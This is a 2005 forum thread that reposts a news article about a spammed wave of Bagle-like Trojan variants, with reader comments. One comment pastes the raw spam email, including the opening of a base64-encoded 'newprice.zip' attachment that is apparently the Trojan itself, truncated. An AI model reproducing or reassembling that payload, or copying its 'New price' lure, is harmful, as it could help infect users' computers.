But nooooo. Ten thousand bozos will turn their computers into spam engines by clicking on this thing. And then they'll wonder why their computer is running so slowly. |
Posted on 03/01/2005 12:36:33 PM PST by Eagle9
A major wave of Bagle-like Trojan horses hit users worldwide Tuesday with numerous variations that aim to overwhelm anti-virus defenses by morphing faster than research labs can release new signatures.
The attack, which began about midnight EST, was launched in a large-scale spamming campaign, said virus researchers, and although the new threat doesn't spread on its own -- these are Trojans with Bagle characteristics, not true worms -- many security vendors have bumped up warnings to get out the word.
It's unclear how many variations are at loose. Some vendors, such as Symantec, had reported only two as of mid-morning Tuesday. Others, such as the U.K.-based Sophos, said there were at least four or five distinct versions. According to Reston, Va.-based iDefense, some sources are reporting as many as 15 copy-cats.
"Wave attacks are becoming increasingly common," said Ken Dunham, iDefense's director of malicious code research, in an e-mail to TechWeb. "Multiple minor variants are rapidly seeded into the wild to help the overall success of the attack."
The purpose of the attack seems to be to infect a large number of systems, which can later be turned into spam zombies, worm launch pads, or denial-of-service proxies.
"Compromised systems could cause all kinds of mischief," said Graham Cluley, a senior technology consultant with Sophos. "The attacker's intention is to use those computers for some other purpose, perhaps spamming. Once the Trojan's in place, it can update by downloading a new malicious component from any of a large number of Web sites."
So far, the sites -- which are hard-coded into the Trojan horse -- aren't hosting anything suspicious, added Cluley, but Sophos and others are monitoring the sites carefully. It's not unusual for an attack to infect systems, leave a backdoor open like this, and then only much later -- after the "heat" has died down -- download the zombie code.
These Trojans -- which in the confusion of the attack and the long-running problem with multiple Bagle versions, are named everything from Bagle.be to Beagle.bh to BagleDI-L -- also try to disable a large number of anti-virus or firewall products found on the target PC.
Other self-defense tactics used by the Trojans include changing the Windows HOST file to make it impossible for users to connect with security Web sites for virus updates, and renaming a security software files so that once the system is rebooted, anti-virus and/or firewall programs won't run.
"Any Trojan which turns off your anti-virus or firewall can open you up to further attack, even by very old viruses," added Cluley.
Most of the variations arrive as .exe attachments or within .zip compressed files, joined to terse e-mails with no subject and a message reading simply "Price" or "New price."
The quick spread of the threat is due to the large spamming run that launched it. "This was spammed out en mass," said Cluley. "Some companies have seen thousands of copies hit their gateways."
Most security firms were reporting a continued increase in the number of copies reaching users. "Just nine hours after it began, it was already seventh on our list of Trojan horses," said Cluley.
The facts that the initial spam seeding was much larger than usual and that so many variants rolled out so quickly speak to the deviousness of hackers, said iDefense's Dunham.
"Hackers have been testing their code prior to the attack to ensure that certain anti-virus products do not detect the new minor variants," he said. "They've have become increasingly sophisticated and organized in what they're doing [as they] attempt to steal sensitive information or gain control over computers."
The usual recommendations apply, security firms told users: update anti-virus defenses often.
Cluley went a step further. "It's time everyone woke up and stopped executable code at the gateway. There's no reason why users should be installing software from any e-mail message. That should all have to come through the IT department. Doing anything else [but blocking executables] is a huge security risk."
The usual recommendations apply, security firms told users: update anti-virus defenses often.
Cluley went a step further. "It's time everyone woke up and stopped executable code at the gateway. There's no reason why users should be installing software from any e-mail message. That should all have to come through the IT department. Doing anything else [but blocking executables] is a huge security risk."
It is intersesting that these attacks keep coming. I really don't think it's your little nerd sitting at his puter at home anymore.
Theres a really good way to avoid this, its a great cure. --> http://distrowatch.com/
I had to be the first :)
Virus alert!
Stop--correction should be "Trojan" Alert!
Is this Windows Outlook specific?
Good grief. Maybe you can explain to me what the point is of disrupting the lives of so many people. just for the H of it? What a waste of time, energy and intellect.
No, it's Dumb User Opening Attachment specific.
Bah! The people writing these viruses are the good guys. Let's not blame them for anything. It's all Microsoft's fault. </sarcasm>
But nooooo. Ten thousand bozos will turn their computers into spam engines by clicking on this thing. And then they'll wonder why their computer is running so slowly. |
Any company that allows any kind of content that might contain a virus payload in through their email gateway deserves to get hit. If you need to get software from someone, there are other ways than email to get it.
Not being able to email executable code is a mild inconvenience compared to having to clean up the mess caused by a virus let loose in a corporate LAN environment. I speak from experience.
I think it is one or more foreign governments / their militaries.
I've been getting these idiotic FBI@FBI.GOV e-mails claiming "You've been visiting 40 illegal sites" and demaning I fillout a questionnaire conveniently contained in a compressed file.
Or, you can use FireFox on OS X.
True, but it's no longer kids doing it for fun.
Virus/spam and crime are a team now. There's an underground economy in infected machines (bots) used for spam and denial of service attacks have been used in extortion of online gambling sites.
Doohickey -- I've been getting the same attack since last Friday... I delete everyone of them without looking because I figure if going to RushLimbaugh.com and Free Republic are illegal websites I'm ready for a confrontation with any authorities....
Let's contribute something constructive to the discussion, okay? :^)
----------bilnsatjoywkldgbtsxk
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit
<html><body>
price<br><br>
<br>
</body></html>
----------bilnsatjoywkldgbtsxk
Content-Type: application/octet-stream;
name="newprice.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="newprice.zip"
UEsDBBQAAAAIAFamYTIdXuMSkj0AAACGAAAKAAAAZG9jXzAyLmV4ZexaCVxTx9Y/Kbb4qBVe
N2tdsLV2F+1iX98rAra1KhW1avGpgKAWkUUWLYsSgwWVRQQEpQGJKAiKLNaFLSxBRMEiuFIB
F1wQZF8FN+Y7c28Skpi4oLHf+/08cDKZOWdm/jP537nn3MRkHgAHAF5AJQTACFiRlAemHn8H
VAj1mTERYCrnRbn2KtDmvEwH7Ye6V9oIoIM6QtxTh520n9gsKUGHw4IBSaHD+kpLacHIhKsA
J+kbL4Bac1VI+yCI016Fqb8M4EMaCoBkxAhAJPE79wKI167Cbyr7/o4Jvox9gJ9YmLV6oVqA
dL9Y4cj5MWNVob6Paql6PFZeAA0WptdALJ3YGWSkP8MVX2ynU0ZjSf3TsaTLPIElZUItli+x
ULw0sXgLS7pnYzmK43GY8SYraadiyQFQ1u6kot1LRXuwivZoFe17VbSLVLSfUNFehUXLGtwP
mc/nnA/Ah7L+6wB2Deyt7gpD7d9bnxEFYCNzeaXvQPuo3rplIdZl+Ne/HP379dad
Disclaimer: Opinions posted on Free Republic are those of the individual posters and do not necessarily represent the opinion of Free Republic or its management. All materials posted herein are protected by copyright law and the exemption for fair use of copyrighted works.
You would think that by now, no one would be dumb enough to click on an email attachment, especially one in "terse e-mails with no subject and a message reading simply 'Price' or 'New price'."